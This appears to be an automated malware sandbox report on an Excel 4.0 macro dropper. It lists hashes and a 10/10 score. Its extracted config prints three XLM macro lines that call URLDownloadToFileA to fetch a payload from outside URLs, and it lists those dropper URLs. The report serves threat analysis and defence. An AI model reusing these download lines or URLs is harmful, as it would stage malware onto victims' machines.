0aff84728b19fd5967a72f6121b0ea1a0e3e7f51c326f3c8a535b1ba1427d1b8

General

Target

0aff84728b19fd5967a72f6121b0ea1a0e3e7f51c326f3c8a535b1ba1427d1b8
Size

37KB
Sample

241120-29kzlswepj
MD5

81dc5401145259ca60aafd91f6c7a70e
SHA1

149349ffb81eee3cfe7860a4c3e7866e95525b9e
SHA256

0aff84728b19fd5967a72f6121b0ea1a0e3e7f51c326f3c8a535b1ba1427d1b8
SHA512

f40162e3aef995f925af9f55569df1458f90f974645b9205ce234983d3fdb178e8763b68e530852f10d6259232eeb3d7ad1cf6a29f70de144a5bb4991bb1bbed
SSDEEP

768:MI/I83+rjevZCwVIMvxmUxjfC30+kS4QyoO0VI2UKM:MIn+IIMvxXYk4pTVIf

Score

10^/10

Malware Config

Extracted

Language

xlm4.0

Source

1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://luxurycompacthomes.com.au/uninsulting/8rhMBnRbt77/", "..\besta.ocx")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://amaphuphoproductions.co.za/1TOorPQE6ipicDUCaozfS/", "..\besta.ocx")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://hipma.unikom.ac.id/wp-admin/vj9pl9UamhYFDy/", "..\besta.ocx")

URLs

xlm40.dropper

https://luxurycompacthomes.com.au/uninsulting/8rhMBnRbt77/

xlm40.dropper

https://amaphuphoproductions.co.za/1TOorPQE6ipicDUCaozfS/

xlm40.dropper

http://hipma.unikom.ac.id/wp-admin/vj9pl9UamhYFDy/

Targets

- Target
  
  0aff84728b19fd5967a72f6121b0ea1a0e3e7f51c326f3c8a535b1ba1427d1b8
- Size
  
  37KB
- MD5
  
  81dc5401145259ca60aafd91f6c7a70e
- SHA1
  
  149349ffb81eee3cfe7860a4c3e7866e95525b9e
- SHA256
  
  0aff84728b19fd5967a72f6121b0ea1a0e3e7f51c326f3c8a535b1ba1427d1b8
- SHA512
  
  f40162e3aef995f925af9f55569df1458f90f974645b9205ce234983d3fdb178e8763b68e530852f10d6259232eeb3d7ad1cf6a29f70de144a5bb4991bb1bbed
- SSDEEP
  
  768:MI/I83+rjevZCwVIMvxmUxjfC30+kS4QyoO0VI2UKM:MIn+IIMvxXYk4pTVIf
Score

10^/10

discovery
behavioral1 behavioral2